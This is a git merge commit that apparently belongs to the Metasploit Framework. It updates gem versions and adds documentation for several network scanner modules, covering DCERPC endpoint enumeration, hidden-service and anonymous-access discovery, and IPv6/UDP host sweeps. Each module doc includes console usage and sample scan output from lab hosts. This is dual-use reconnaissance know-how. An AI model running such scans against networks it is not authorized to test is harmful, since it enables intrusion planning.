Merge branch 'goliath' into MS-2909
commit
b42c3ff654
4
Gemfile
4
Gemfile
|
@ -27,6 +27,10 @@ group :development do
|
||||||
'x86-mingw32', 'x64-mingw32',
|
'x86-mingw32', 'x64-mingw32',
|
||||||
'x86_64-linux', 'x86-linux',
|
'x86_64-linux', 'x86-linux',
|
||||||
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
|
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
|
||||||
|
gem 'google-protobuf', "3.5.1" if [
|
||||||
|
'x86-mingw32', 'x64-mingw32',
|
||||||
|
'x86_64-linux', 'x86-linux',
|
||||||
|
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
|
||||||
end
|
end
|
||||||
|
|
||||||
group :development, :test do
|
group :development, :test do
|
||||||
|
|
|
@ -131,7 +131,7 @@ GEM
|
||||||
multipart-post (>= 1.2, < 3)
|
multipart-post (>= 1.2, < 3)
|
||||||
filesize (0.1.1)
|
filesize (0.1.1)
|
||||||
fivemat (1.3.5)
|
fivemat (1.3.5)
|
||||||
google-protobuf (3.5.1.2)
|
google-protobuf (3.5.1)
|
||||||
googleapis-common-protos-types (1.0.1)
|
googleapis-common-protos-types (1.0.1)
|
||||||
google-protobuf (~> 3.0)
|
google-protobuf (~> 3.0)
|
||||||
googleauth (0.6.2)
|
googleauth (0.6.2)
|
||||||
|
@ -268,7 +268,7 @@ GEM
|
||||||
metasm
|
metasm
|
||||||
rex-arch
|
rex-arch
|
||||||
rex-text
|
rex-text
|
||||||
rex-exploitation (0.1.16)
|
rex-exploitation (0.1.17)
|
||||||
jsobfu
|
jsobfu
|
||||||
metasm
|
metasm
|
||||||
rex-arch
|
rex-arch
|
||||||
|
|
|
@ -0,0 +1,117 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/dcerpc/endpoint_mapper```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
### Example Windows 2003, and Windows 7 Targets
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/dcerpc/endpoint_mapper
|
||||||
|
msf auxiliary(endpoint_mapper) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(endpoint_mapper) > set THREADS 55
|
||||||
|
threads => 55
|
||||||
|
msf auxiliary(endpoint_mapper) > run
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
...snip...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (dhcpcsvc) [DHCP Client LRPC Endpoint]
|
||||||
|
[*] 3473dd4d-2e88-4006-9cba-22570909dd10 v5.0 LRPC (W32TIME_ALT) [WinHttp Auto-Proxy Service]
|
||||||
|
[*] 3473dd4d-2e88-4006-9cba-22570909dd10 v5.0 PIPE (\PIPE\W32TIME_ALT) \\XEN-2K3-BARE [WinHttp Auto-Proxy Service]
|
||||||
|
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
|
||||||
|
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
|
||||||
|
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
|
||||||
|
[*] 906b0ce0-c70b-1067-b317-00dd010662da v1.0 LRPC (LRPC00000408.00000001)
|
||||||
|
[*] Could not connect to the endpoint mapper service
|
||||||
|
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 PIPE (\PIPE\lsass) \\XEN-2K3-BARE
|
||||||
|
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (audit)
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (securityevent)
|
||||||
|
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (protected_storage)
|
||||||
|
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 PIPE (\PIPE\protected_storage) \\XEN-2K3-BARE
|
||||||
|
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 LRPC (dsrole)
|
||||||
|
[*] 12345778-1234-abcd-ef00-0123456789ac v1.0 TCP (1025) 192.168.1.204
|
||||||
|
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 PIPE (\PIPE\lsass) \\XEN-2K3-BARE [IPSec Policy agent endpoint]
|
||||||
|
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (audit) [IPSec Policy agent endpoint]
|
||||||
|
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (securityevent) [IPSec Policy agent endpoint]
|
||||||
|
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (protected_storage) [IPSec Policy agent endpoint]
|
||||||
|
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 PIPE (\PIPE\protected_storage) \\XEN-2K3-BARE [IPSec Policy agent endpoint]
|
||||||
|
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 LRPC (dsrole) [IPSec Policy agent endpoint]
|
||||||
|
[*] 12345678-1234-abcd-ef00-0123456789ab v1.0 TCP (1025) 192.168.1.204 [IPSec Policy agent endpoint]
|
||||||
|
[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 LRPC (wzcsvc)
|
||||||
|
[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D)
|
||||||
|
[*] 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE
|
||||||
|
[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 LRPC (wzcsvc)
|
||||||
|
[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D)
|
||||||
|
[*] 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE
|
||||||
|
[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 LRPC (wzcsvc)
|
||||||
|
[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 LRPC (OLE3B0AF7639CA847BCA879F781582D)
|
||||||
|
[*] 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 PIPE (\PIPE\atsvc) \\XEN-2K3-BARE
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (DNSResolver) [DHCP Client LRPC Endpoint]
|
||||||
|
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 TCP (49152) 192.168.1.202
|
||||||
|
[*] 4b112204-0e19-11d3-b42b-0000f81feb9f v1.0 LRPC (LRPC-71ea8d8164d4fa6391)
|
||||||
|
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc05FBE22)
|
||||||
|
[*] 12e65dd8-887f-41ef-91bf-8d816c42c2e7 v1.0 LRPC (WMsgKRpc05FBE22) [Secure Desktop LRPC interface]
|
||||||
|
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (OLE7A8F68570F354B65A0C8D44DCBE0)
|
||||||
|
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 PIPE (\pipe\trkwks) \\XEN-WIN7-BARE
|
||||||
|
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (trkwks)
|
||||||
|
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (RemoteDevicesLPC_API)
|
||||||
|
[*] b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 LRPC (TSUMRPD_PRINT_DRV_LPC_API)
|
||||||
|
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (OLE7A8F68570F354B65A0C8D44DCBE0) [PcaSvc]
|
||||||
|
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 PIPE (\pipe\trkwks) \\XEN-WIN7-BARE [PcaSvc]
|
||||||
|
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (trkwks) [PcaSvc]
|
||||||
|
[*] 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 LRPC (RemoteDevicesLPC_API) [PcaSvc]
|
||||||
|
...snip...
|
||||||
|
[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 LRPC (eventlog) [Event log TCPIP]
|
||||||
|
[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [Event log TCPIP]
|
||||||
|
[*] f6beaff7-1e19-4fbb-9f8f-b89e2018337c v1.0 TCP (49153) 192.168.1.202 [Event log TCPIP]
|
||||||
|
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (eventlog) [NRP server endpoint]
|
||||||
|
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [NRP server endpoint]
|
||||||
|
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 TCP (49153) 192.168.1.202 [NRP server endpoint]
|
||||||
|
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (AudioClientRpc) [NRP server endpoint]
|
||||||
|
[*] 30adc50c-5cbc-46ce-9a0e-91914789e23c v1.0 LRPC (Audiosrv) [NRP server endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (eventlog) [DHCP Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [DHCP Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 TCP (49153) 192.168.1.202 [DHCP Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (AudioClientRpc) [DHCP Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (Audiosrv) [DHCP Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 LRPC (dhcpcsvc) [DHCP Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (eventlog) [DHCPv6 Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [DHCPv6 Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 TCP (49153) 192.168.1.202 [DHCPv6 Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (AudioClientRpc) [DHCPv6 Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (Audiosrv) [DHCPv6 Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (dhcpcsvc) [DHCPv6 Client LRPC Endpoint]
|
||||||
|
[*] 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 LRPC (dhcpcsvc6) [DHCPv6 Client LRPC Endpoint]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (eventlog) [Security Center]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 PIPE (\pipe\eventlog) \\XEN-WIN7-BARE [Security Center]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 TCP (49153) 192.168.1.202 [Security Center]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (AudioClientRpc) [Security Center]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (Audiosrv) [Security Center]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (dhcpcsvc) [Security Center]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (dhcpcsvc6) [Security Center]
|
||||||
|
[*] 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 LRPC (OLE7F5D2071B7D4441897C08153F2A2) [Security Center]
|
||||||
|
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc045EC1)
|
||||||
|
[*] c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 v1.0 LRPC (LRPC-af541be9090579589d) [Impl friendly name]
|
||||||
|
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WMsgKRpc0441F0)
|
||||||
|
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 PIPE (\PIPE\InitShutdown) \\XEN-WIN7-BARE
|
||||||
|
[*] 76f226c3-ec14-4325-8a99-6a46348418af v1.0 LRPC (WindowsShutdown)
|
||||||
|
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 LRPC (WMsgKRpc0441F0)
|
||||||
|
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 PIPE (\PIPE\InitShutdown) \\XEN-WIN7-BARE
|
||||||
|
[*] d95afe70-a6d5-4259-822e-2c84da1ddb0d v1.0 LRPC (WindowsShutdown)
|
||||||
|
[*] Could not connect to the endpoint mapper service
|
||||||
|
[*] Scanned 06 of 55 hosts (010% complete)
|
||||||
|
...snip...
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(endpoint_mapper) >
|
||||||
|
```
|
|
@ -0,0 +1,62 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The hidden scanner connects to a given range of IP addresses and tries to locate any RPC services that are not listed in the Endpoint Mapper and determines if anonymous access to the service is allowed.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/dcerpc/hidden```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/dcerpc/hidden
|
||||||
|
msf auxiliary(hidden) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(hidden) > set THREADS 55
|
||||||
|
THREADS => 55
|
||||||
|
msf auxiliary(hidden) > run
|
||||||
|
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
...snip...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] Connecting to the endpoint mapper service...
|
||||||
|
[*] Could not obtain the endpoint list: DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*] Could not contact the endpoint mapper on 192.168.1.203
|
||||||
|
[*] Could not obtain the endpoint list: DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*] Could not contact the endpoint mapper on 192.168.1.201
|
||||||
|
[*] Could not connect to the endpoint mapper service
|
||||||
|
[*] Could not contact the endpoint mapper on 192.168.1.250
|
||||||
|
[*] Looking for services on 192.168.1.204:1025...
|
||||||
|
[*] HIDDEN: UUID 12345778-1234-abcd-ef00-0123456789ab v0.0
|
||||||
|
[*] Looking for services on 192.168.1.202:49152...
|
||||||
|
[*] CONN BIND CALL ERROR=DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*]
|
||||||
|
[*] HIDDEN: UUID c681d488-d850-11d0-8c52-00c04fd90f7e v1.0
|
||||||
|
[*] CONN BIND CALL ERROR=DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*]
|
||||||
|
[*] HIDDEN: UUID 11220835-5b26-4d94-ae86-c3e475a809de v1.0
|
||||||
|
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*]
|
||||||
|
[*] HIDDEN: UUID 5cbe92cb-f4be-45c9-9fc9-33e73e557b20 v1.0
|
||||||
|
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*]
|
||||||
|
[*] HIDDEN: UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0
|
||||||
|
[*] CONN BIND CALL DATA=0000000057000000
|
||||||
|
[*]
|
||||||
|
[*] HIDDEN: UUID 1cbcad78-df0b-4934-b558-87839ea501c9 v0.0
|
||||||
|
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*]
|
||||||
|
[*] HIDDEN: UUID c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
|
||||||
|
[*] CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*]
|
||||||
|
[*] Remote Management Interface Error: The connection timed out (192.168.1.202:49152).
|
||||||
|
...snip...
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(hidden) >
|
||||||
|
```
|
|
@ -0,0 +1,87 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The dcerpc/management module scans a range of IP addresses and obtains information from the Remote Management interface of the DCERPC service.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/dcerpc/management```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Example Windows 2003, and Windows 7 Targets
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/dcerpc/management
|
||||||
|
msf auxiliary(management) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(management) > set THREADS 55
|
||||||
|
THREADS => 55
|
||||||
|
msf auxiliary(management) > run
|
||||||
|
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*] UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
|
||||||
|
[*] Remote Management Interface Error: The connection was refused by the remote host (192.168.1.250:135).
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b v1.1
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID 1d55b526-c137-46c5-ab79-638f2a68e869 v1.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID e60c73e6-88f9-11cf-9af1-0020af6e72f4 v2.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID 99fcfec4-5260-101b-bbcb-00aa0021347a v0.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID b9e79e60-3d52-11ce-aaa1-00006901293f v0.2
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID 412f241e-c12a-11ce-abff-0020af6e7a17 v0.2
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID 00000136-0000-0000-c000-000000000046 v0.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID c6f3ee72-ce7e-11d1-b71e-00c04fc3111a v1.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 v0.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
[*] UUID 000001a0-0000-0000-c000-000000000046 v0.0
|
||||||
|
[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
|
||||||
|
[*] listening: 00000000
|
||||||
|
[*] killed: 00000005
|
||||||
|
[*] name: 00010000000000000100000000000000d3060000
|
||||||
|
...snip...
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(management) >
|
||||||
|
```
|
|
@ -0,0 +1,43 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The dcerpc/tcp_dcerpc_auditor module scans a range of IP addresses to determine what DCERPC services are available over a TCP port.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Example Windows 2003, and Windows 7 Targets
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
|
||||||
|
msf auxiliary(tcp_dcerpc_auditor) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(tcp_dcerpc_auditor) > set THREADS 55
|
||||||
|
THREADS => 55
|
||||||
|
msf auxiliary(tcp_dcerpc_auditor) > run
|
||||||
|
|
||||||
|
The connection was refused by the remote host (192.168.1.250:135).
|
||||||
|
The host (192.168.1.210:135) was unreachable.
|
||||||
|
...snip...
|
||||||
|
The host (192.168.1.200:135) was unreachable.
|
||||||
|
[*] Scanned 38 of 55 hosts (069% complete)
|
||||||
|
...snip...
|
||||||
|
The host (192.168.1.246:135) was unreachable.
|
||||||
|
192.168.1.203 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
|
||||||
|
192.168.1.201 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
|
||||||
|
192.168.1.204 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000076070000
|
||||||
|
192.168.1.202 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
|
||||||
|
192.168.1.204 - UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA 135 ACCESS GRANTED 000002000b0000000b00000004000200080002000c0002001000020014000200180002001c0002002000020024000200280002002c0002000883afe11f5dc91191a408002b14a0fa0300000084650a0b0f9ecf11a3cf00805f68cb1b0100010026b5551d37c1c546ab79638f2a68e86901000000e6730ce6f988cf119af10020af6e72f402000000c4fefc9960521b10bbcb00aa0021347a00000000609ee7b9523dce11aaa100006901293f000002001e242f412ac1ce11abff0020af6e7a17000002003601000000000000c0000000000000460000000072eef3c67eced111b71e00c04fc3111a01000000b84a9f4d1c7dcf11861e0020af6e7c5700000000a001000000000000c0000000000000460000000000000000
|
||||||
|
192.168.1.204 - UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa 3.0 OPEN VIA 135 ACCESS GRANTED d8060000
|
||||||
|
[*] Scanned 52 of 55 hosts (094% complete)
|
||||||
|
[*] Scanned 54 of 55 hosts (098% complete)
|
||||||
|
The connection timed out (192.168.1.205:135).
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(tcp_dcerpc_auditor) >
|
||||||
|
```
|
|
@ -0,0 +1,50 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This auxiliary module probes the local network for IPv6 hosts that respond to Neighbor Solicitations with a link-local address. This module, like the arp_sweep one, will generally only work within the attacking machine’s broadcast domain. It serves the dual-purpose of showing what hosts are online similar to arp_sweep and then performs the IPv6 Neighbor Discovery.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/discovery/ipv6_neighbor```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set SHOST [IP]```
|
||||||
|
4. Do: ```set SMAC [MAC]```
|
||||||
|
5. Do: ```set THREADS [number of threads]```
|
||||||
|
6. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/discovery/ipv6_neighbor
|
||||||
|
msf auxiliary(ipv6_neighbor) > set RHOSTS 192.168.1.2-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(ipv6_neighbor) > set SHOST 192.168.1.101
|
||||||
|
SHOST => 192.168.1.101
|
||||||
|
msf auxiliary(ipv6_neighbor) > set SMAC d6:46:a7:38:15:65
|
||||||
|
SMAC => d6:46:a7:38:15:65
|
||||||
|
msf auxiliary(ipv6_neighbor) > set THREADS 55
|
||||||
|
THREADS => 55
|
||||||
|
msf auxiliary(ipv6_neighbor) > run
|
||||||
|
|
||||||
|
[*] IPv4 Hosts Discovery
|
||||||
|
[*] 192.168.1.10 is alive.
|
||||||
|
[*] 192.168.1.11 is alive.
|
||||||
|
[*] 192.168.1.2 is alive.
|
||||||
|
[*] 192.168.1.69 is alive.
|
||||||
|
[*] 192.168.1.109 is alive.
|
||||||
|
[*] 192.168.1.150 is alive.
|
||||||
|
[*] 192.168.1.61 is alive.
|
||||||
|
[*] 192.168.1.201 is alive.
|
||||||
|
[*] 192.168.1.203 is alive.
|
||||||
|
[*] 192.168.1.205 is alive.
|
||||||
|
[*] 192.168.1.206 is alive.
|
||||||
|
[*] 192.168.1.99 is alive.
|
||||||
|
[*] 192.168.1.97 is alive.
|
||||||
|
[*] 192.168.1.250 is alive.
|
||||||
|
[*] IPv6 Neighbor Discovery
|
||||||
|
[*] 192.168.1.69 maps to IPv6 link local address fe80::5a55:caff:fe14:1e61
|
||||||
|
[*] 192.168.1.99 maps to IPv6 link local address fe80::5ab0:35ff:fe6a:4ecc
|
||||||
|
[*] 192.168.1.97 maps to IPv6 link local address fe80::7ec5:37ff:fef9:a96a
|
||||||
|
[*] Scanned 253 of 253 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(ipv6_neighbor) >
|
||||||
|
```
|
|
@ -0,0 +1,42 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The `udp_sweep` module scans across a given range of hosts to detect commonly available UDP services.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/discovery/udp_sweep```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
